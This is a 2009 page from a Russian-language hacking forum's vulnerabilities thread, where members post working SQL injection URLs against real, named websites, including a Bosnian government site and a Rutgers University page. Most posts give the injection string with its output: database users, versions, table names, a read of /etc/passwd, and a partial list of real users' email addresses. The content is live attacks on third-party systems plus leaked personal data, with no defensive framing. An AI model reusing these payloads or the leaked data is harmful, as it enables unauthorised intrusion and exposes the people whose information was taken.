ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10041  
Старый 30.06.2009, 19:28
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Как мило. Я почему-то решил, что уж подобрать столбцы и вывести сможет любой ) Поэтому и нераскрученные... тем более недокрученных было всего 4 из 9 = ) Ну ладно

www.iddeea.gov.ba

Код:
http://www.iddeea.gov.ba/hr_vijesti.php?id=-191+union+select+1,concat(user(),0x3a,version()),3,4/*

root@80.65.66.99:5.0.45

Вывод из mysql.user есть ;)

[TABLES]
user
user_info
users
db

user:
User
Password

user_info:
Full_name
Email

users:
email

db:
db
user


Users.Email:
zagorkresevo@hotmail.com
strateski.razvoj@etikete-agens
nevzad_r@hotmail.com
...
Ctacok, жжошь Сам бы ни за что не догадался (:

Последний раз редактировалось Fata1ex; 30.06.2009 в 19:37..
 
Ответить с цитированием

  #10042  
Старый 30.06.2009, 19:53
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Цитата:
http://ocenshik.mostpp.ru/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,%20user(),%2 0database(),%20version()),6,7,8+/*
root@zvm27.host.ru: ocenshik:4.0.27
 
Ответить с цитированием

  #10043  
Старый 30.06.2009, 20:31
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME%20+FRO M+INFORMATION_SCHEMA.TABLES)--

Плохо в MSSQL скулях так что не судите
 
Ответить с цитированием

  #10044  
Старый 30.06.2009, 22:41
beerhack
Участник форума
Регистрация: 01.03.2008
Сообщений: 149
Провел на форуме:
3395070

Репутация: 173
По умолчанию

PR 6
Код:
http://www.eohsi.rutgers.edu/facultystaff/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,concat_ws(0x3a,user,password),49,50,51,52,53,54,55,56,57,58,59,60+from+mysql.user/*
Database Version: 4.0.12
Database name: eohsi
User name: root@localhost

/etc/passwd
Код:
http://www.eohsi.rutgers.edu/facultystaff/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,load_file(0x2F6574632F706173737764),49,50,51,52,53,54,55,56,57,58,59,60/*
 
Ответить с цитированием

  #10045  
Старый 01.07.2009, 03:21
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.nwaacc.org/soccer/news.php?id=667%27+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
version():4.0.25
database():nwl-nwaacc
user():nwl-nwaacc@web06
 
Ответить с цитированием

  #10046  
Старый 01.07.2009, 09:28
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.sovinservice.ru/aks_thomas.php?id=-23+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3,4,5,6--

sovin251@v45.valuehost.ru:sovin251:4.0.27-max-log

Последний раз редактировалось jokester; 01.07.2009 в 11:51.. Причина: jiou-li.com.tw БОЯН
 
Ответить с цитированием

  #10047  
Старый 01.07.2009, 14:25
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию

Код HTML:
http://www.reproductionfabrics.com/shelf.php?ID=-3+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--
5.0.45-log:mtconnect2:rfabrics@mercury.vcn.com

Код HTML:
http://www.dala.com.ua/index.php?menu_id=-5+union+select+1,concat_ws(0x3a,version(),database(),user())--
5.0.45:dala_db:dala_1@localhost
 
Ответить с цитированием

  #10048  
Старый 01.07.2009, 15:10
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

PostgreSQL

albatros-film.com

[PR = 4]
Код:
http://www.albatros-film.com/list.phtml?genreid=27+and+1=cast((SELECT+version()||chr(%20%2058)||current_user||chr(58)||current_database())+as%20%20+int)--
version PostgreSQL 7.3.4 on i686-pc-linux-gnu, compiled by GCC 2.96
user postgres
database albatrosdb


30 колонок

Код:
http://www.albatros-film.com/list.phtml?genreid=27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
nfi.no

[PR = 6]
Код:
http://www.nfi.no/barnunge/filmstudieark/film.html?id=205+and+1=cast((SELECT+version()||chr(%20%2058)||current_user||chr(58)||current_database())+as%20%20+int)--
version PostgreSQL 7.3.4 on i386-unknown-freebsd4.3, compiled by GCC 2.95.3:
user wdnfi
database nfi2
 
Ответить с цитированием

ahta.ru
  #10049  
Старый 01.07.2009, 15:58
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию ahta.ru

http://ahta.ru/pages.php5?sym=products&show=prod&cid=-00000858+union+select+concat_ws(0x0b,user(),databa se(),version()),2
Цитата:
z73313_ahtasite@77.221.130.5
z73313_ahtasite
5.0.30-Debian_1-log
Таблицы:
http://ahta.ru/pages.php5?sym=products&show=prod&cid=-00000858+union+select+group_concat(table_name),2+f rom+information_schema.tables+group+by+table_schem a+limit+1,1
Цитата:
pages,user,brands,vac,news

Последний раз редактировалось InFlame; 01.07.2009 в 16:00..
 
Ответить с цитированием

  #10050  
Старый 01.07.2009, 17:57
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
http://www.citadelhockey.com/archive/archive.php?id=-18+union+select+1,2,3,4,version(),6,7--
Database Version: 5.0.67-community
Database name: citadelh_roster09
User name: citadelh_coachsp@localhost

----------------------------------------------------------------------------------------------------------

Код:
http://www.ephnotes.org/index2.php?issue=-1204+union+select+1,2,3,4,5,version()/*
Database Version: 4.1.22-standard
Database name: alumsite_alumniatwilliams
User name: alumsite_ephcard@localhost

Последний раз редактировалось Skofield; 01.07.2009 в 18:14..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ